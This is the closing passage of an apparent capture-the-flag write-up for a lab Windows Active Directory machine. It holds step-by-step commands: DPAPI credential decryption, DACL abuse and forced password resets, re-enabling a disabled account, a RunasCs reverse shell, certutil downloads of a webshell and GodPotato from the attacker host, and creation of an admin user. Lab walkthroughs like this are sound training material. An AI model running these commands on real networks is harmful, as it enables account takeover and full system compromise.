<p>This gets us the master key we can use to decrypt this credential file.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ dpapi.py credential -f DPAPI/03128079C6E14F37F5AEBDD69E344291 -key &lt;SNIP&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[CREDENTIAL]</span><br><span class="line">LastWritten : 2025-10-30 15:53:55+00:00</span><br><span class="line">Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)</span><br><span class="line">Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)</span><br><span class="line">Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)</span><br><span class="line">Target      : Domain:target=emma-exclusive-access</span><br><span class="line">Description :</span><br><span class="line">Unknown     :</span><br><span class="line">Username    : city.local\emma.hayes</span><br><span class="line">Unknown     : &lt;SNIP&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/img/bazzinga.gif"></p>
<h1 id="Get-him-in-the-Group"><a href="#Get-him-in-the-Group" class="headerlink" title="Get him in the Group!!!"></a>Get him in the Group!!!</h1><p><img src="/img/cityc6.png"></p>
<p>Looking at <em>emma.hayes</em>‘s permissions, we have some interesting permissions.</p>
<p>Also, if we read the email we got from the windows images we can see that <em>web_admin</em> has been put in the <em>Quarantine</em> OU.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">Subject: Notice: web_admin account moved to Quarantine OU</span><br><span class="line"></span><br><span class="line">Hi Sam,</span><br><span class="line"></span><br><span class="line">This is to inform you that the web_admin account has been moved to the Quarantine OU following security concerns identified during recent system activity.</span><br><span class="line">The web server has ASP.NET enabled and file uploads of .aspx pages are possible; in combination with the web_admin account this creates a scenario could be used to escalate privileges or perform unauthorized actions.</span><br><span class="line"></span><br><span class="line">No production impact has been confirmed, but the account has been isolated for forensic review as a precautionary measure.</span><br><span class="line"></span><br><span class="line">If you require any temporary access or need updates regarding the investigation, please contact Emma Hayes (Helpdesk) at emma.hayes for coordination and approval.</span><br><span class="line"></span><br><span class="line">Regards,</span><br><span class="line">Administrator</span><br><span class="line">IT Operations</span><br></pre></td></tr></table></figure>

<p>So in order to escalate to <em>web_admin</em> we have to remove him and put him in the <em>CityOps</em> OU. First we need <em>FullControl</em> over the DACL. Then we change his DN showing him in the <em>CityOps</em> OU.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ dacledit.py -target-dn <span class="string">&#x27;OU=CITYOPS,DC=CITY,DC=LOCAL&#x27;</span> -principal emma.hayes -inheritance -rights <span class="string">&#x27;FullControl&#x27;</span> -action write <span class="string">&#x27;city.local/emma.hayes:&lt;SNIP&gt;&#x27;</span></span><br><span class="line">Impacket v0.14.0.dev0+20251107.4500.2f1d6eb2 - Copyright Fortra, LLC and its affiliated companies</span><br><span class="line"></span><br><span class="line">[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU</span><br><span class="line">[*] DACL backed up to dacledit-20260610-133755.bak</span><br><span class="line">[*] DACL modified successfully!</span><br></pre></td></tr></table></figure>

<p>Then set the distinguishedName.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ bloodyAD -d city.local -u emma.hayes -p <span class="string">&#x27;&lt;SNIP&gt;&#x27;</span> -H DC-CC.city.local <span class="built_in">set</span> object web_admin distinguishedName -v <span class="string">&#x27;CN=Web Admin,OU=CityOps,DC=city,DC=local&#x27;</span></span><br></pre></td></tr></table></figure>

<p>Since hes in a group we control, we can set his password.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ bloodyAD -d city.local -u emma.hayes -p <span class="string">&#x27;&lt;SNIP&gt;&#x27;</span> -H DC-CC.city.local <span class="built_in">set</span> password web_admin <span class="string">&#x27;P@ssw0rd123!&#x27;</span></span><br></pre></td></tr></table></figure>

<h1 id="One-way-street"><a href="#One-way-street" class="headerlink" title="One way street"></a>One way street</h1><p>We don’t have access to the machine as <em>web_admin</em>, but we can look at who is in the <em>Remote Management Users</em> group. This seems to be <em>sam.brooks</em>, so we can change their password and get on the machine.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ bloodyAD -d city.local -u emma.hayes -p <span class="string">&#x27;&lt;SNIP&gt;&#x27;</span> -H DC-CC.city.local <span class="built_in">set</span> password sam.brooks <span class="string">&#x27;P@ssw0rd123!&#x27;</span></span><br></pre></td></tr></table></figure>

<p><img src="/img/disabled.gif"></p>
<p>Looking over <em>sam.brooks</em>, we ALSO see that their account is <strong>Disabled</strong>.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT</span><br></pre></td></tr></table></figure>

<p>We can remove this UAC and then get on the machine.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ bloodyAD -d city.local -u emma.hayes -p <span class="string">&#x27;&lt;SNIP&gt;&#x27;</span> -H DC-CC.city.local remove uac sam.brooks -f ACCOUNTDISABLE</span><br></pre></td></tr></table></figure>

<p>Getting access to the machine.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ evil-winrm -i city.local -u sam.brooks -p <span class="string">&#x27;P@ssw0rd123!&#x27;</span></span><br><span class="line"></span><br><span class="line">Evil-WinRM shell v3.9</span><br><span class="line"></span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc<span class="string">&#x27; for module Reline</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Info: Establishing connection to remote endpoint</span></span><br><span class="line"><span class="string">/var/lib/gems/3.3.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...</span></span><br><span class="line"><span class="string">*Evil-WinRM* PS C:\Users\sam.brooks\Documents&gt; cd ..</span></span><br><span class="line"><span class="string">*Evil-WinRM* PS C:\Users\sam.brooks&gt; tree /f</span></span><br><span class="line"><span class="string">Folder PATH listing</span></span><br><span class="line"><span class="string">Volume serial number is CCCC-FB95</span></span><br><span class="line"><span class="string">C:.</span></span><br><span class="line"><span class="string">ÃÄÄÄDesktop</span></span><br><span class="line"><span class="string">³       user.txt</span></span><br><span class="line"><span class="string">³</span></span><br></pre></td></tr></table></figure>

<h1 id="Getting-ONE-more-shell"><a href="#Getting-ONE-more-shell" class="headerlink" title="Getting ONE more shell"></a>Getting ONE more shell</h1><p><img src="/img/oneofus.gif"></p>
<p>We need to have access as <em>web_admin</em>, the easiest way to do this is <em>RunAsCs</em> and redirect to get a shell.</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\ProgramData&gt; .\RunasCs_net2.exe web_admin P@ssw0rd123! cmd.exe <span class="literal">-r</span> <span class="number">10.200</span>.<span class="number">38.163</span>:<span class="number">32000</span></span><br><span class="line">[*] Warning: User profile directory <span class="keyword">for</span> user web_admin does not exists. Use <span class="literal">--force-profile</span> <span class="keyword">if</span> you want to force the creation.</span><br><span class="line">[*] Warning: The logon <span class="keyword">for</span> user <span class="string">&#x27;web_admin&#x27;</span> is limited. Use the flag combination <span class="literal">--bypass-uac</span> and <span class="literal">--logon-type</span> <span class="string">&#x27;5&#x27;</span> to obtain a more privileged token.</span><br><span class="line"></span><br><span class="line">[+] Running <span class="keyword">in</span> session <span class="number">0</span> with <span class="keyword">process</span> <span class="function"><span class="keyword">function</span> <span class="title">CreateProcessWithLogonW</span><span class="params">()</span></span></span><br><span class="line">[+] <span class="keyword">Using</span> Station\Desktop: Service-0x0-2caa26$\Default</span><br><span class="line">[+] Async <span class="keyword">process</span> <span class="string">&#x27;C:\Windows\system32\cmd.exe&#x27;</span> with pid <span class="number">5856</span> created <span class="keyword">in</span> background.</span><br></pre></td></tr></table></figure>

<p>And our listener.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ rlwrap -cAr nc -lvnp 32000</span><br><span class="line">listening on [any] 32000 ...</span><br><span class="line">connect to [10.200.38.163] from (UNKNOWN) [10.1.155.120] 49977</span><br><span class="line">Microsoft Windows [Version 10.0.17763.5936]</span><br><span class="line">(c) 2018 Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;<span class="built_in">whoami</span></span><br><span class="line"><span class="built_in">whoami</span></span><br><span class="line">city\web_admin</span><br><span class="line"></span><br><span class="line">C:\Windows\system32&gt;</span><br></pre></td></tr></table></figure>

<h1 id="I-was-framed"><a href="#I-was-framed" class="headerlink" title="I was framed"></a>I was framed</h1><p>The <em>web_admin</em> was disabled because ASP.NET is enabled, which means we can upload a webshell and access it from the webpage.</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">C:\<span class="title">inetpub</span>\<span class="title">wwwroot</span>&gt;<span class="title">certutil</span> -<span class="title">f</span> -<span class="title">urlcache</span> <span class="title">http</span>://10.200.38.163/<span class="title">cmdasp.aspx</span> <span class="title">cmd.aspx</span></span></span><br><span class="line"><span class="function"><span class="title">certutil</span> -<span class="title">f</span> -<span class="title">urlcache</span> <span class="title">http</span>://10.200.38.163/<span class="title">cmdasp.aspx</span> <span class="title">cmd.aspx</span></span></span><br><span class="line"><span class="function">****  <span class="title">Online</span>  ****</span></span><br><span class="line"><span class="function"><span class="title">CertUtil</span>: -<span class="title">URLCache</span> <span class="title">command</span> <span class="title">completed</span> <span class="title">successfully</span>.</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">inetpub</span>\<span class="title">wwwroot</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h1 id="Its-about-to-be-super-juicy"><a href="#Its-about-to-be-super-juicy" class="headerlink" title="Its about to be super juicy"></a>Its about to be super juicy</h1><p><img src="/img/cityc7.png"></p>
<p>Back on the webpage we can access this page and we see have <strong>SeImpersonate</strong> available to us as the service user <em>iis apppool</em>. We can upload <em>GodPotato</em>, and just create an administrator.</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">C:\<span class="title">inetpub</span>\<span class="title">wwwroot</span>&gt;<span class="title">certutil</span> -<span class="title">f</span> -<span class="title">urlcache</span> <span class="title">http</span>://10.200.38.163/<span class="title">GodPotato</span>-<span class="title">NET2.exe</span> <span class="title">GP.exe</span></span></span><br><span class="line"><span class="function"><span class="title">certutil</span> -<span class="title">f</span> -<span class="title">urlcache</span> <span class="title">http</span>://10.200.38.163/<span class="title">GodPotato</span>-<span class="title">NET2.exe</span> <span class="title">GP.exe</span></span></span><br><span class="line"><span class="function">****  <span class="title">Online</span>  ****</span></span><br><span class="line"><span class="function"><span class="title">CertUtil</span>: -<span class="title">URLCache</span> <span class="title">command</span> <span class="title">completed</span> <span class="title">successfully</span>.</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">C</span>:\<span class="title">inetpub</span>\<span class="title">wwwroot</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>Then on the webpage we run our command to add our user and add them to the administrators group.</p>
<p><img src="/img/cityc8.png"></p>
<h1 id="I-have-spoken"><a href="#I-have-spoken" class="headerlink" title="I have spoken"></a>I have spoken</h1><p><img src="/img/spoken.gif"></p>
<p>Now we have access as administrator to the machine.</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$</span> evil<span class="literal">-winrm</span> <span class="literal">-i</span> city.local <span class="literal">-u</span> jay <span class="literal">-p</span> jay4m4y0<span class="built_in">r</span></span><br><span class="line">&lt;SNIP&gt;</span><br><span class="line"></span><br><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\Users\jay\Documents&gt; <span class="built_in">cd</span> \Users\Administrator</span><br><span class="line">*Evil<span class="literal">-WinRM</span>* <span class="built_in">PS</span> C:\Users\Administrator&gt; tree /f</span><br><span class="line">Folder PATH listing</span><br><span class="line">Volume serial number is CCCC<span class="literal">-FB95</span></span><br><span class="line">C:.</span><br><span class="line">ÃÄÄÄ<span class="number">3</span>D Objects</span><br><span class="line">ÃÄÄÄContacts</span><br><span class="line">ÃÄÄÄDesktop</span><br><span class="line">³       root.txt</span><br></pre></td></tr></table></figure>

<p><img src="/img/robocop.gif"></p>
</article><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/ntlm-theft/">ntlm theft</a><a class="post-meta__tags" href="/tags/kerberoasting-SPNs/">kerberoasting SPNs</a><a class="post-meta__tags" href="/tags/GenericWrite/">GenericWrite</a><a class="post-meta__tags" href="/tags/DACL-Abuse/">DACL Abuse</a><a class="post-meta__tags" href="/tags/DPAPI/">DPAPI</a><a class="post-meta__tags" href="/tags/spoofing/">spoofing</a></div><div class="post-share"><div class="social-share" data-image="/img/cc.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related full-width" href="/2026/03/23/Pirate/" title="Pirate (Windows Hard)"><img class="cover" src="/img/pirate.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="info text-right"><div class="info-1"><div class="info-item-1">Next</div><div class="info-item-2">Pirate (Windows Hard)</div></div><div class="info-2"><div class="info-item-1"> This machine provides an engaging challenge, beginning with an initial set of credentials. By performing a RID brute-force attack, we identify several computer accounts and discover that one is susceptible to password reuse using our existing credentials. After analyzing the environment in Bloodhound, we find that MSO1$ has ReadGMSAPassword permissions over both GMSA_ADFS_PROD$ and GMSA_ADCS_PROD$. By retrieving the password for the GMSA service account, we gain a foothold on the system. Further enumeration reveals a secondary network interface; by pivoting through Ligolo, we discover another host: WEB01$. Investigation of WEB01$ shows that WebDAV is active. By adding a valid DNS record pointing to our attacker machine, we can coerce authentication from WEB01$. This provides an authentication context as WEB01$, allowing us to configure Resource-Based Constrained Delegation (RBCD) on a GMSA user. Requesting a service ticket via this delegation path grants us Administrator access to...</div></div></div></a></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/hacking-crook.gif" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">Jay</div><div class="author-info-description">An aspiring hacker and a CTF player</div><div class="site-data"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">24</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">62</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">3</div></a></div><div class="card-info-social-icons"><a class="social-icon" href="https://github.com/itzgottabejay" target="_blank" title="Github"><i class="fab fa-github" style="color: #E2E6E6;"></i></a><a class="social-icon" href="https://www.linkedin.com/in/ianberdahl/" target="_blank" title="LinkedIn"><i class="fab fa-linkedin" style="color: #007aff;"></i></a><a class="social-icon" href="https://app.hackthebox.com/profile/420575" target="_blank" title="HackTheBox"><i class="fa-solid fa-cube" style="color: #2dfc04;"></i></a><a class="social-icon" href="https://www.instagram.com/junkie_mayhem/" target="_blank" title="Instagram"><i class="fab fa-instagram" style="color: #833AB4;"></i></a><a class="social-icon" href="https://x.com/deadcyberninja" target="_blank" title="X"><i class="fab fa-x-twitter" style="color: #000404;"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">I like to put things here for safe keeping 🔐🔐</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Initial-Scan"><span class="toc-number">1.</span> <span class="toc-text">Initial Scan</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Running-for-Council"><span class="toc-number">2.</span> <span class="toc-text">Running for Council</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#The-Stone-Portal"><span class="toc-number">3.</span> <span class="toc-text">The Stone Portal</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Meet-in-the-Middle"><span class="toc-number">4.</span> <span class="toc-text">Meet in the Middle</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Bloodhound-Obtained"><span class="toc-number">5.</span> <span class="toc-text">Bloodhound Obtained</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Kerberos-Kills"><span class="toc-number">6.</span> <span class="toc-text">Kerberos Kills</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Sharing-is-Caring"><span class="toc-number">7.</span> <span class="toc-text">Sharing is Caring</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Your-Toast"><span class="toc-number">8.</span> <span class="toc-text">Your Toast</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Your-Public-Image"><span class="toc-number">9.</span> <span class="toc-text">Your Public Image</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Get-him-in-the-Group"><span class="toc-number">10.</span> <span class="toc-text">Get him in the Group!!!</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#One-way-street"><span class="toc-number">11.</span> <span class="toc-text">One way street</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Getting-ONE-more-shell"><span class="toc-number">12.</span> <span class="toc-text">Getting ONE more shell</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#I-was-framed"><span class="toc-number">13.</span> <span class="toc-text">I was framed</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Its-about-to-be-super-juicy"><span class="toc-number">14.</span> <span class="toc-text">Its about to be super juicy</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#I-have-spoken"><span class="toc-number">15.</span> <span class="toc-text">I have spoken</span></a></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url(/img/n8.jpg);"><div id="footer-wrap"></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Reading Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Toggle Between Light and Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle Between Single-column and Double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="Settings"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back to Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script id="click-show-text" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/click-show-text.min.js" data-mobile="false" data-text="IM,WATCHING,YOU" data-fontsize="21px" data-random="false" async="async"></script><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">Search</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="text-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  Loading Database</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Where do you want to go?" type="text"/></div></div><hr/><div id="local-search-results"></div><div id="local-search-stats-wrap"></div></div></div><div id="search-mask"></div><script src="/js/search/local-search.js"></script></div></div></body></html>